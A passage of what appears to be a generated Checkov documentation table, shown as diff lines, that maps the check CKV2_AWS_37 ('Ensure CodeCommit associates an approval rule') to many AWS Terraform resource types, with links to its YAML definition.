aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 897 | CKV2_AWS_37 | resource | 
aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 898 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 899 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 900 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 901 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 902 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 903 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 904 | 
CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 905 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 906 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 907 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 908 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 909 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 910 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 911 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 912 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 913 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 914 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 915 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 916 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 917 | CKV2_AWS_37 | resource | 
aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 918 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 919 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 920 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 921 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 922 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 923 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 924 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 925 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 926 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 927 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 928 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 929 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 930 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | 
Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 931 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 932 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 933 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 934 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 935 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 936 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 937 | CKV2_AWS_37 | resource | 
aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 938 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 939 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 940 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 941 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 942 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 943 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 944 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 945 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 946 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 947 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 948 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 949 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 950 | CKV2_AWS_37 | resource | aws_opsworks_permission | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 951 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 952 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 953 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 954 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 955 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 956 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 957 
| CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 958 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 959 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 960 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 961 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 962 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 963 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 964 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 965 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 966 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 967 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 968 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 969 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 970 | CKV2_AWS_37 | resource | 
aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 971 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 972 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 973 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 974 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 975 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 976 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 
977 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 978 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 979 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 980 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 981 | CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 982 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 983 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 984 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 985 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 986 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 987 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 988 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 989 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 990 | CKV2_AWS_37 | resource | aws_redshift_security_group | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 991 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 992 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 993 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 994 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 995 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 996 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
+| 997 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 998 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 999 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1000 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1001 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | 